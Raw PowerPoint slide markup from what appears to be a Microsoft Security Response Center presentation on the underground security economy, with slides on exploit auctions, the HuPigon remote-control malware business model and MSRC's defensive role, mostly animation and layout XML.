                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="74" presetID="17" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="80" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="10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2900" y="2249488"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Economic Trends</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8" descr="738px-Zona_Leste_-_S%C3%A3o_Paulo-Brasil.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="7434263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135927" y="464971"/>
            <a:ext cx="9144000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Security Economy Characteristics</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1498600"/>
            <a:ext cx="8382000" cy="2211388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Lots of Money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Lots of Creativity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Endless Opportunity</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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Auction </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23555" name="Picture 2" descr="http://osvdb.org/ref/blog/ebay-bug.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1303338" y="1447800"/>
            <a:ext cx="6151562" cy="4672013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="3962400"/>
            <a:ext cx="6934200" cy="2444750"/>
            <a:chOff x="914400" y="3962400"/>
            <a:chExt cx="6934200" cy="2444959"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23558" name="Picture 2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="914400" y="3962400"/>
              <a:ext cx="6934200" cy="2444959"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23559" name="TextBox 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1066800" y="4191000"/>
              <a:ext cx="3200400" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Office Finder Herd </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2004-2006</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3467100" y="4381500"/>
            <a:ext cx="2895600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Direct sale ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="xshopin.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1501775" y="828675"/>
            <a:ext cx="5505450" cy="5553075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4787900" y="977900"/>
            <a:ext cx="3224213" cy="4786313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1289050" y="958850"/>
            <a:ext cx="3054350" cy="4857750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6235700" y="2716213"/>
            <a:ext cx="1676400" cy="45720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81000" y="230188"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Business Start-up – HuPigon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1414463"/>
            <a:ext cx="3468688" cy="3841750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="287338" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>End-to-end “long distance remote control software” service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Choice of offerings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Client/Server software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Infrastructure leasing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Sales Support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Technical Support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Monthly fees </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>paid to developer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Copyright registered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Attack vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-287338" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>E-mail, web, and USB key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="huigezi-download.PNG"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923415" y="1414463"/>
            <a:ext cx="4839586" cy="5173778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>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878013"/>
            <a:ext cx="8382000" cy="1329595"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>MSRC Role &amp; View of the Ecosystem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>MSRC Role</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8382000" cy="5619750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Protect our customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Understand the security ecosystem </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Analyzing threats and respond to them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Provide early warning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Work with partners as part of distributed defense network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Change the Game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Root cause analysis and provide feedback and guidance to product groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Influence negative trends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Balance the asymmetry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:xfrm>
            <a:off x="381000" y="230188"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>The TWC Memo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25604" name="Picture 4" descr="TWCMemo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="38710"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1371600"/>
            <a:ext cx="5638800" cy="5049838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>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5604"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256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Picture 50" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2044700" y="2592388"/>
            <a:ext cx="466725" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Picture 51" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2592388"/>
            <a:ext cx="466725" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29700" name="Picture 52" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4889500" y="2592388"/>
            <a:ext cx="466725" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
